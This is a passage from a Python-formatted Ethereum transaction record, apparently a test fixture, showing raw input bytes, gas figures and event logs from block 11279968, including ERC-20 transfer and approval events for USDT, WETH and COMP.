b\x06\x99E\x97\xc1=\x83\x1e\xc7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\xee\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x1fM\\\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06zJSC\xb7M\xe2\x8c\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\xa01\x953\xc5xRz\xe6\x9b\xf7\xfa-(\x9f \xb9\xb5\\\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x93\\\xbd\xd0\"\x87\xb5\x11\x11\x9d\xdb\x11\xae\xb4/\x15\x93\xb7\xef\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x8b\nm\xf6\xd3\x03\xae\x89\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xe8\xa6\xc3\xbf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x1fM\\\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02`\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00W\x84Y\x87\xc8\xc8Y\xd5)1\xee$\x8d\x8d\x84\xab\x10S$\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf1O\x06HC\\\xf3O\x8b\xc8\x00\xd4\xe7\x1f\xf0\xba\x15\xbcR\xdd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02j\xc5j\xd6\x07\xa6\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05 \x9d\r\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00_\xb4\xac\xca\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01u\xd9\xc1q\xa7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\xf4ra\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0*\xaa9\xb2#\xfe\x8d\n\x0e\\O'\xea\xd9\x08<ul\xc2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc4{p\x94\xf3x\xe5CG\xe2\x81\xaa\xb1p\xe8\xcc\xa6\x9d\x88\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02d\x08\x10\xb1\xf0\x100\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x1fM\\\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00_\xb4\xc8\x87es\xa7\x92\xd8\xfa\xba9\x1a\x98[\x93|\x96\xdf\xe36\xf8\x02\"\x85\xa4\xe5\xd5\xfa+\x07\xc3\xee\xf9\x83F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02$\xdc\x16\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0*\xaa9\xb2#\xfe\x8d\n\x0e\\O'\xea\xd9\x08<ul\xc2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc4{p\x94\xf3x\xe5CG\xe2\x81\xaa\xb1p\xe8\xcc\xa6\x9d\x88\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xda\xc1\x7f\x95\x8d.\xe5#\xa2 b\x06\x99E\x97\xc1=\x83\x1e\xc7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdc\xd6\x01\x1fLk\x80\xe4p\xd9H\x7fXq\xa0\xcb\xa7\xc9?H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x1fM\\\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02d\x08\x10\xb1\xf0\x100\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xda\xc1\x7f\x95\x8d.\xe5#\xa2 b\x06\x99E\x97\xc1=\x83\x1e\xc7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0*\xaa9\xb2#\xfe\x8d\n\x0e\\O'\xea\xd9\x08<ul\xc2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\xf4ra\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xda\xc1\x7f\x95\x8d.\xe5#\xa2 b\x06\x99E\x97\xc1=\x83\x1e\xc7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00B\x1c\xa1\xa7\xc1+\x19;h\xe6\xac=Bi\xb9\xc1\xfdu\x05\x1a\x01-\xb6>\xcd\x99\xd2\x17\xf7\xb8\xbc\x95\xba\xdbt\xa1\xc0~\x00F\xc5\xf9\x8f\x8b:\xcf\x1ft]\x1c\xc0\xb8\x95\x0e\xc8R\xba\x92\x9c\xa1G\x9cn\x02_\xf1\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x86\x95\x84\xcd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x002-X\xb9\xe7Zi\x18\xf7\xe7\x84\x9a\xee\x0f\xf0\x93i\x97~\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00<\xf9\xca\xf5\x92_\xb4\xacg\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
"gas_limit": 1402309,
"gas_price": 95000000000,
"gas_used": 1045273,
"logs": [
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xF14f0648435CF34f8bC800d4E71FF0Ba15bC52dD",
"logIndex": 136,
"data": "0x00000000000000000000000000000000000000000000000000479f69c6ac000000000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000b441cff79cd000000000000000000000000533c8844ba1922b88d892aca090df0cc0c292f1b00000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000ac4f708847b00000000000000000000000000000000000000000000000000000000000000800000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc90000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee000000000000000000000000000000000000000000000000000000051f4d5c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000067a4a5343b74de28cc000000000000000000000000000003ba0319533c578527ae69bf7fa2d289f20b9b55c00000000000000000000000061935cbdd02287b511119ddb11aeb42f1593b7ef00000000000000000000000000000000000000000000000000000000000001200000000000000000000000000000000000000000068b0a6df6d303ae8900000000000000000000000000000000000000000000000000000000000000000008e8a6c3bf330000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000051f4d5c00000000000000000000000000000000000000000000000000000000000000078000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000026000000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000100000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026ac56ad607a6a00000000000000000000000000000000000000000000000000000000005209d0d7f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4acca00000000000000000000000000000000000000000000000000000175d9c171a700000000000000000000000000000000000000000000000000000000000001c0000000000000000000000000000000000000000000000000000000000000064000000000000000000000000000000000000000000000000000000000000006a000000000000000000000000000000000000000000000000000000000000006a00000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc200000000000000000000000000000000000000000000000000000000000000000000000000000000c47b7094f378e54347e281aab170e8cca69d880a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002640810b1f010301d000000000000000000000000000000000000000000000000000000051f4d5c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4c8876573a792d8faba391a985b937c96dfe336f8022285a4e5d5fa2b07c3eef9834600000000000000000000000000000000000000000000000000000000000001c00000000000000000000000000000000000000000000000000000000000000420000000000000000000000000000000000000000000000000000000000000048000000000000000000000000000000000000000000000000000000000000004800000000000000000000000000000000000000000000000000000000000000224dc1600f3000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000c47b7094f378e54347e281aab170e8cca69d880a000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000001a0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000020000000000000000000000000dcd6011f4c6b80e470d9487f5871a0cba7c93f48000000000000000000000000000000000000000000000000000000051f4d5c00000000000000000000000000000000000000000000000002640810b1f010301d0000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000002000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000000000000000000000000000000000000000000421ca1a7c12b193b68e6ac3d4269b9c1fd75051a012db63ecd99d217f7b8bc95badb74a1c07e0046c5f98f8b3acf1f745d1cc0b8950ec852ba929ca1479c6e025ff10300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010400000000000000000000000000000000000000000000000000000000000000869584cd000000000000000000000000322d58b9e75a6918f7e7849aee0ff09369977e0800000000000000000000000000000000000000000000003cf9caf5925fb4ac6700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000",
"removed": False,
"topics": [
HexBytes("0x1cff79cd00000000000000000000000000000000000000000000000000000000"),
HexBytes("0x0000000000000000000000005668ead1edb8e2a4d724c8fb9cb5ffeabeb422dc"),
HexBytes("0x000000000000000000000000533c8844ba1922b88d892aca090df0cc0c292f1b"),
HexBytes("0x0000000000000000000000000000000000000000000000000000000000000040"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9",
"logIndex": 137,
"data": "0x0000000000000000000000000000000000000000000000000000088ee804439c00000000000000000000000000000000000000000000000000000000043f9e830000000000000000000000000000000000000000000000000e80cfd37ffe100800000000000000000000000000000000000000000000000000001d139751603c",
"removed": False,
"topics": [
HexBytes("0x4dec04e750ca11537cabcd8a9eab06494de08da3735bc8871cd41250e190bc04")
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xc00e94Cb662C3520282E6f5717214004A7f26888",
"logIndex": 138,
"data": "0x000000000000000000000000000000000000000000000000064fdb83b0307d50",
"removed": False,
"topics": [
HexBytes("0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"),
HexBytes("0x0000000000000000000000003d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0x3d9819210A31b4961b30EF54bE2aeD79B9c9Cd3B",
"logIndex": 139,
"data": "0x000000000000000000000000000000000000000000000000064fdb83b0307d50000000000000000000000000000f81764ab6c0f546d710606e89bc296ba11e96",
"removed": False,
"topics": [
HexBytes("0x1fc3ecc087d8d2d15e23d0032af5a47059c3892d003d8e139fdcb6bb327c99a6"),
HexBytes("0x000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xdAC17F958D2ee523a2206206994597C13D831ec7",
"logIndex": 140,
"data": "0x000000000000000000000000000000000000000000000000000000051f4d5c00",
"removed": False,
"topics": [
HexBytes("0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"),
HexBytes("0x000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xf650C3d88D12dB855b8bf7D11Be6C55A4e07dCC9",
"logIndex": 141,
"data": "0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000000000000051f4d5c000000000000000000000000000000000000000000000000000000002bee8c02a100000000000000000000000000000000000000000000000000001d18b69ebc3c",
"removed": False,
"topics": [
HexBytes("0x13ed6866d4e1ee6da46f845c46d7e54120883d75c5ea9a2dacc1c4ca8984ab80")
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xdAC17F958D2ee523a2206206994597C13D831ec7",
"logIndex": 142,
"data": "0x0000000000000000000000000000000000000000000000000000000003473bc0",
"removed": False,
"topics": [
HexBytes("0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
HexBytes("0x000000000000000000000000322d58b9e75a6918f7e7849aee0ff09369977e08"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xdAC17F958D2ee523a2206206994597C13D831ec7",
"logIndex": 143,
"data": "0x0000000000000000000000000000000000000000000000000000000000000000",
"removed": False,
"topics": [
HexBytes("0x8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
HexBytes("0x00000000000000000000000095e6f48254609a6ee006f7d493c8e5fb97094cef"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xdAC17F958D2ee523a2206206994597C13D831ec7",
"logIndex": 144,
"data": "0x000000000000000000000000000000000000000000000000000000051c062040",
"removed": False,
"topics": [
HexBytes("0x8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
HexBytes("0x00000000000000000000000095e6f48254609a6ee006f7d493c8e5fb97094cef"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0x61935CbDd02287B511119DDb11Aeb42F1593b7Ef",
"logIndex": 145,
"data": "0x000000000000000000000000000000000000000000000000000000000000016000000000000000000000000000000000000000000000000000000000000001c000000000000000000000000000000000000000000000000000000000000002200000000000000000000000000000000000000000000000000000000000000240000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000002689b8d5f98f1cbc8000000000000000000000000000000000000000000000000000000051c062040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000017a023c7c1a0000000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000",
"removed": False,
"topics": [
HexBytes("0x6869791f0a34781b29882982cc39e882768cf2c96995c2a110c577c53bc932d5"),
HexBytes("0x00000000000000000000000057845987c8c859d52931ee248d8d84ab10532407"),
HexBytes("0x0000000000000000000000001000000000000000000000000000000000000011"),
HexBytes("0x37593fc865d3f3712f13e5a5c86cca53f1728ed4484809675840433bcc9c5a30"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
"0x509e2a7bc82fade6f91b7c1efb47f89940efad06661bc3d1d0e8bc37e4325428"
),
"address": "0xdAC17F958D2ee523a2206206994597C13D831ec7",
"logIndex": 146,
"data": "0x000000000000000000000000000000000000000000000000000000051c062040",
"removed": False,
"topics": [
HexBytes("0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef"),
HexBytes("0x000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
HexBytes("0x00000000000000000000000057845987c8c859d52931ee248d8d84ab10532407"),
],
"blockNumber": 11279968,
"transactionIndex": 60,
"transactionHash": HexBytes(
"0x0537316f37627655b7fe5e50e23f71cd835b377d1cde4226443c94723d036e32"
),
},
{
"blockHash": HexBytes(
